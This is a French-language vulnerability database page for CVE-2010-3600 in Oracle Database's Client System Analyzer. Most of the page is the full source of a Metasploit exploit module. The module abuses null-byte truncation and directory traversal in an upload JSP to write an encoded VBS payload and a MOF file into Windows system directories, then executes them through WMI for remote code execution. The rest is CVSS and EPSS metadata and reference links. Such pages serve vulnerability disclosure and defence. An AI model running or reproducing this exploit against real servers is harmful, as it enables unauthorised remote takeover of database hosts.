CVE-2010-3600 : Détail

CVE-2010-3600

75.91%V4
Network
2011-01-19
14h00 +00:00
2017-08-16
12h57 +00:00
CVE.org
NVD
Notifications pour un CVE
Restez informé de toutes modifications pour un CVE spécifique.
Gestion des notifications

Descriptions du CVE

Unspecified vulnerability in the Client System Analyzer component in Oracle Database Server 11.1.0.7 and 11.2.0.1 and Enterprise Manager Grid Control 10.2.0.5 allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors. NOTE: the previous information was obtained from the January 2011 CPU. Oracle has not commented on claims from a reliable third party coordinator that this issue involves an exposed JSP script that accepts XML uploads in conjunction with NULL bytes in an unspecified parameter that allow execution of arbitrary code.

Informations du CVE

Faiblesses connexes

CWE-ID Nom de la faiblesse Source
CWE Other No informations.

Métriques

Métriques Score Gravité CVSS Vecteur Source
V2 7.5 AV:N/AC:L/Au:N/C:P/I:P/A:P nvd@nist.gov

EPSS

EPSS est un modèle de notation qui prédit la probabilité qu'une vulnérabilité soit exploitée.

Score EPSS

Le modèle EPSS produit un score de probabilité compris entre 0 et 1 (0 et 100 %). Plus la note est élevée, plus la probabilité qu'une vulnérabilité soit exploitée est grande.

Percentile EPSS

Le percentile est utilisé pour classer les CVE en fonction de leur score EPSS. Par exemple, une CVE dans le 95e percentile selon son score EPSS est plus susceptible d'être exploitée que 95 % des autres CVE. Ainsi, le percentile sert à comparer le score EPSS d'une CVE par rapport à d'autres CVE.
EPSS First.org

Informations sur l'Exploit

Exploit Database EDB-ID : 22714

Date de publication : 2012-11-14 23h00 +00:00
Auteur : Metasploit
EDB Vérifié : Yes

## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # web site for more information on licensing and terms of use. # http://metasploit.com/ ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking HttpFingerprint = { :pattern => [ /Oracle Containers for J2EE/ ] } include Msf::Exploit::Remote::HttpClient include Msf::Exploit::EXE include Msf::Exploit::WbemExec def initialize(info = {}) super(update_info(info, 'Name' => 'Oracle Database Client System Analyzer Arbitrary File Upload', 'Description' => %q{ This module exploits an arbitrary file upload vulnerability on the Client Analyzer component as included in Oracle Database 11g, which allows remote attackers to upload and execute arbitrary code. This module has been tested successfully on Oracle Database 11g 11.2.0.1.0 on Windows 2003 SP2, where execution through the Windows Management Instrumentation service has been used. }, 'Author' => [ '1c239c43f521145fa8385d64a9c32243', # Vulnerability discovery 'juan vazquez' # Metasploit module ], 'License' => MSF_LICENSE, 'Platform' => [ 'win' ], 'Privileged' => true, 'References' => [ [ 'CVE', '2010-3600' ], [ 'OSVDB', '70546'], [ 'BID', '45883'], [ 'URL', 'http://www.zerodayinitiative.com/advisories/ZDI-11-018/' ], [ 'URL', 'http://www.oracle.com/technetwork/topics/security/cpujan2011-194091.html' ] ], 'Targets' => [ [ 'Oracle Oracle11g 11.2.0.1.0 / Windows 2003 SP2', {} ] ], 'DefaultTarget' => 0, 'DisclosureDate' => 'Jan 18 2011' )) register_options( [ Opt::RPORT(1158), OptBool.new('SSL', [true, 'Use SSL', true]), OptInt.new('DEPTH', [true, 'Traversal depth to reach the root', 13]) ], self.class ) end def on_new_session(client) return if not @var_mof_name return if not @var_vbs_name vbs_path = "C:\\windows\\system32\\#{@var_vbs_name}.vbs" mof_path = "C:\\windows\\system32\\wbem\\mof\\good\\#{@var_mof_name}.mof" if client.type != "meterpreter" print_error("NOTE: you must use a meterpreter payload in order to automatically cleanup.") print_error("The vbs payload (#{vbs_path}) and mof file (#{mof_path}) must be removed manually.") return end # stdapi must be loaded before we can use fs.file client.core.use("stdapi") if not client.ext.aliases.include?("stdapi") attrib_path = "C:\\windows\\system32\\attrib.exe -r " cmd = attrib_path + mof_path client.sys.process.execute(cmd, nil, {'Hidden' => true }) begin print_warning("Deleting the vbs payload \"#{@var_vbs_name}.vbs\" ...") client.fs.file.rm(vbs_path) print_warning("Deleting the mof file \"#{@var_mof_name}.mof\" ...") client.fs.file.rm(mof_path) rescue ::Exception => e print_error("Exception: #{e.inspect}") end end def upload_file(data) res = send_request_cgi( { 'uri' => '/em/ecm/csa/v10103/CSAr.jsp', 'method' => 'POST', 'data' => data }) return res end def check file_name = rand_text_alpha(rand(5)+5) file_contents = rand_text_alpha(rand(20)+20) data = "sessionID=#{file_name}.txt\x00.xml" data << "\x0d\x0a" data << Rex::Text.uri_encode(file_contents) print_status("Uploading the CSA#{file_name}.txt file") res = upload_file(data) if not res or res.code != 200 or (res.body !~ /posted data was written to placeholder file/ and res.body !~ /csaPostStatus=0/) print_error("The test file could not be uploaded") return Exploit::CheckCode::Safe end print_status("Checking uploaded contents...") res = send_request_raw({'uri' => "/em/CSA#{file_name}.txt"}) if res and res.code == 200 and res.body =~ /#{file_contents}/ return Exploit::CheckCode::Vulnerable end return Exploit::CheckCode::Appears end def exploit # In order to save binary data to the file system the payload is written to a .vbs # file and execute it from there. @var_mof_name = rand_text_alpha(rand(5)+5) @var_vbs_name = rand_text_alpha(rand(5)+5) print_status("Encoding payload into vbs...") # Only 100KB can be uploaded by default, because of this "to_win32pe_old" is used, # the "new" template is too big in this case. exe = Msf::Util::EXE.to_win32pe_old(framework, payload.encoded) # The payload is embedded in a vbs and executed from there to avoid badchars that # URLDecoder.decode (jsp) is unable to decode correctly such as 0x81, 0x8d, 0x8f, # 0x90 and 0x9d vbs = Msf::Util::EXE.to_exe_vbs(exe) print_status("Generating mof file...") mof_content = generate_mof("#{@var_mof_name}.mof", "#{@var_vbs_name}.vbs") traversal = "..\\" * datastore['DEPTH'] data = "sessionID=#{traversal}\\WINDOWS\\system32\\#{@var_vbs_name}.vbs\x00.xml" data << "\x0d\x0a" # The data to upload must be uri encoded because the vulnerable jsp will use # URLDecoder.decode on it before writting to file. data << Rex::Text.uri_encode(vbs) print_status("Uploading the payload into the VBS to c:\\WINDOWS\\system32\\#{@var_vbs_name}.vbs...") res = upload_file(data) if not res or res.code != 200 or (res.body !~ /posted data was written to placeholder file/ and res.body !~ /csaPostStatus=0/) fail_with(Exploit::Failure::Unknown, 'VBS upload failed') end data = "sessionID=#{traversal}WINDOWS\\system32\\wbem\\mof\\#{@var_mof_name}.mof\x00.xml" data << "\x0d\x0a" data << Rex::Text.uri_encode(mof_content) print_status("Uploading the mof file to c:\\WINDOWS\\system32\\wbem\\mof\\#{@var_mof_name}.mof...") res = upload_file(data) if not res or res.code != 200 or (res.body !~ /posted data was written to placeholder file/ and res.body !~ /csaPostStatus=0/) fail_with(Exploit::Failure::Unknown, 'MOF upload failed') end end end

Products Mentioned

Configuraton 0

Oracle>>Database_server >> Version 11.1.0.7

Oracle>>Database_server >> Version 11.2.0.1

Oracle>>Enterprise_manager_grid_control >> Version 10.2.0.5

Références

http://www.vupen.com/english/advisories/2011/0139
Tags : vdb-entry, x_refsource_VUPEN
http://www.securitytracker.com/id?1024972
Tags : vdb-entry, x_refsource_SECTRACK
http://www.securityfocus.com/bid/45883
Tags : vdb-entry, x_refsource_BID
http://secunia.com/advisories/42895
Tags : third-party-advisory, x_refsource_SECUNIA
http://secunia.com/advisories/42921
Tags : third-party-advisory, x_refsource_SECUNIA
http://www.vupen.com/english/advisories/2011/0140
Tags : vdb-entry, x_refsource_VUPEN